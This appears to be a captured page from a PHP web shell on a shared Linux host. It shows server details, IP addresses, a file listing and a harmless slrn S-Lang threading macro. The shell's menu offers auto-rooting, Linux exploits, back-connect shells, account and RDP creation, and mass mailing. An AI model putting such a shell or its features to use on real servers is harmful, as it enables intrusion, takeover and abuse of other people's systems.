Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
slrn /
slang /
[ HOME SHELL ]
Name
Size
Permission
Action
color.sl
3.41
KB
-rw-r--r--
gsort.sl
532
B
-rw-r--r--
ispell.sl
477
B
-rw-r--r--
latin2.sl
3.61
KB
-rw-r--r--
mailcap.sl
8.41
KB
-rw-r--r--
mime.sl
14.1
KB
-rw-r--r--
multipart.sl
2.19
KB
-rw-r--r--
nn.sl
2.29
KB
-rw-r--r--
posthook.sl
1.73
KB
-rw-r--r--
search.sl
1021
B
-rw-r--r--
slrn.sl
2.65
KB
-rw-r--r--
tin-art.sl
6.81
KB
-rw-r--r--
tin-group.sl
2.6
KB
-rw-r--r--
ttyprint.sl
510
B
-rw-r--r--
util.sl
936
B
-rw-r--r--
varset.sl
545
B
-rw-r--r--
xcomment.sl
781
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : multipart.sl
% This macro makes use of subject_compare_hook to put multipart binary % postings into the same thread. % Contributed by Jurriaan Kalkman <thunder7@xs4all.nl> % try to determine if two headers belong to the same multipart % posting. Return 0 if they do, 1 if they don't % % we assume headers use a number in [] or in () to tell us what % part of a multipart-posting this is. % % there are three possible header-types we like: % % 1) blablabla <part-number> % 2) blablabla <file-number> blabla <part-number> % 3) blablabla <part-number> blabla <file-number> % define subject_compare_hook ( subject1, subject2) { variable pattern; variable pos1, pos2, orgpos1, orgpos2, len1, len2, tmp; % Do both headers match the template for a multi-part header? pattern = "[(\\[][0-9]+/[0-9]+[)\\]]"; pos1 = string_match(subject1, pattern, 1); if (pos1 == 0) return 1; % junk the position, but keep the length! (tmp, len1) = string_match_nth(0); orgpos1 = pos1; pos2 = string_match(subject2, pattern, 1); if (pos2 == 0) return 1; % junk the position, but keep the length! (tmp, len2) = string_match_nth(0); orgpos2 = pos2; % make sure we have the last possible match for hdr1 % 5 is the minimum length from the regexp pattern tmp = string_match(subject1, pattern, pos1 + 5); while (tmp > 0) { %pos1 = pos1 + 4 + tmp; pos1 = tmp; tmp = string_match(subject1, pattern, pos1 + 5); } % make sure we have the last possible match for hdr2 tmp = string_match(subject2, pattern, pos2 + 5); while (tmp > 0) { %pos2 = pos2 + 4 + tmp; pos2 = tmp; tmp = string_match(subject2, pattern, pos2 + 5); } % if the part before the matching pattern is the same, they % belong to the same thread if ( 0 == strcmp(substr(subject1, 1, pos1), substr(subject2, 1, pos2))) { return 0; } % we have handled header-type 1) and 2) until now. % now if the first parts match if ( 0 == strcmp(substr(subject1, 1, orgpos1), substr(subject2, 1, orgpos2))) { % and the parts after them match if ( 0 == strcmp(substr(subject1, orgpos1 + len1, -1), substr(subject2, orgpos2 + len2, -1))) { return 0; } } return 1; }
Close